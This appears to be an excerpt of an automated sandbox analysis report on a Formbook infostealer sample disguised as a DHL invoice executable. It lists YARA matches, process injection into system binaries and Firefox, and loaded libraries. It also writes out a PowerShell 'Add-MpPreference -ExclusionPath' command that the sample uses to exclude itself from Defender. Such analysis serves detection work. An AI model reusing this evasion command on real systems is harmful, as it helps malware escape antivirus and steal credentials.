            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D1F9213_2_045D1F92
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468FFB113_2_0468FFB1
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D284013_2_045D2840
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045DA84013_2_045DA840
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0463D80013_2_0463D800
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045FE8F013_2_045FE8F0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D38E013_2_045D38E0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045B68B813_2_045B68B8
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D995013_2_045D9950
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045EB95013_2_045EB950
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045E696213_2_045E6962
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0469A9A613_2_0469A9A6
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045D29A013_2_045D29A0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04643A6C13_2_04643A6C
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468FA4913_2_0468FA49
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04687A4613_2_04687A46
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0467DAC613_2_0467DAC6
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04615AA013_2_04615AA0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0466DAAC13_2_0466DAAC
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045CEA8013_2_045CEA80
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468FB7613_2_0468FB76
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0468AB4013_2_0468AB40
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04645BF013_2_04645BF0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0460DBF913_2_0460DBF9
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_04686BD713_2_04686BD7
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_045EFB8013_2_045EFB80
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0041196013_2_00411960
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0041503013_2_00415030
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0041321013_2_00413210
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0042B70013_2_0042B700
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0040C8C013_2_0040C8C0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0040C8B713_2_0040C8B7
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0040CAE013_2_0040CAE0
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_0040AB6013_2_0040AB60
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048EE4A413_2_048EE4A4
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048EE79D13_2_048EE79D
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048EE38413_2_048EE384
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048ED8A813_2_048ED8A8
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048ED87313_2_048ED873
            Source: C:\Windows\SysWOW64\wextract.exeCode function: 13_2_048ECB5813_2_048ECB58
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 04605130 appears 36 times
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 0464F290 appears 103 times
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 04617E54 appears 93 times
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 045BB970 appears 250 times
            Source: C:\Windows\SysWOW64\wextract.exeCode function: String function: 0463EA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 057BEA12 appears 86 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05797E54 appears 96 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 0573B970 appears 254 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 05785130 appears 37 times
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: String function: 057CF290 appears 103 times
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6540 -s 1348
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic PE information: No import functions for PE file found
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1847215159.000002B400001000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameHurensohn.exe4 vs dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000000.1677272907.000002B47A1C6000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameHurensohn.exe4 vs dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeBinary or memory string: OriginalFilenameHurensohn.exe4 vs dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe
            Source: 4.2.csc.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 4.2.csc.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4139355543.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4140304298.0000000000D20000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2074798692.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000E.00000002.4142164546.0000000005360000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000D.00000002.4140267279.0000000000CD0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2075004528.0000000005600000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 0000000C.00000002.4140287170.0000000002670000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: 00000004.00000002.2075245562.0000000005A60000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C8DF000.00000004.00000020.00020000.00000000.sdmp, dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe, 00000000.00000002.1853707801.000002B47C840000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: f:\binaries\Intermediate\vb\microsoft.visualbasic.build.vbproj_731629843\objr\x86\Microsoft.VisualBasic.pdb
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@14/11@15/8
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
            Source: C:\Windows\System32\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess6540
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4940:120:WilError_03
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ugrcbpth.rpx.ps1Jump to behavior
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeStatic file information: TRID: Win64 Executable GUI Net Framework (217006/5) 49.88%
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: wextract.exe, 0000000D.00000003.2251440236.0000000000756000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2251440236.0000000000777000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000003.2253445634.0000000000777000.00000004.00000020.00020000.00000000.sdmp, wextract.exe, 0000000D.00000002.4139514530.0000000000777000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeReversingLabs: Detection: 47%
            Source: dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeVirustotal: Detection: 45%
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeFile read: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeJump to behavior
            Source: unknownProcess created: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -Force
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WerFault.exe C:\Windows\system32\WerFault.exe -u -p 6540 -s 1348
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeProcess created: C:\Windows\SysWOW64\wextract.exe "C:\Windows\SysWOW64\wextract.exe"
            Source: C:\Windows\SysWOW64\wextract.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exe" -ForceJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\regedit.exe "C:\Windows\regedit.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
            Source: C:\Program Files (x86)\eHctiqUIHXMitvvYEbqHxdywRbuiEQngCgUQOsHexzsESgFy\rQkTBkrqhGpTBn.exeProcess created: C:\Windows\SysWOW64\wextract.exe "C:\Windows\SysWOW64\wextract.exe"Jump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: edputil.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: windows.staterepositoryps.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: wintypes.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: appresolver.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: bcp47langs.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: slc.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: sppc.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: onecorecommonproxystub.dllJump to behavior
            Source: C:\Users\user\Desktop\dhl009544554961.INV.PEK.CO.041.20241115.183845.20241115.183948.34872.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: cabinet.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: version.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: uxtheme.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: ieframe.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: netapi32.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: wkscli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: secur32.dllJump to behavior
            Source: C:\Windows\SysWOW64\wextract.exeSection loaded: mlang.dllJump to behavior
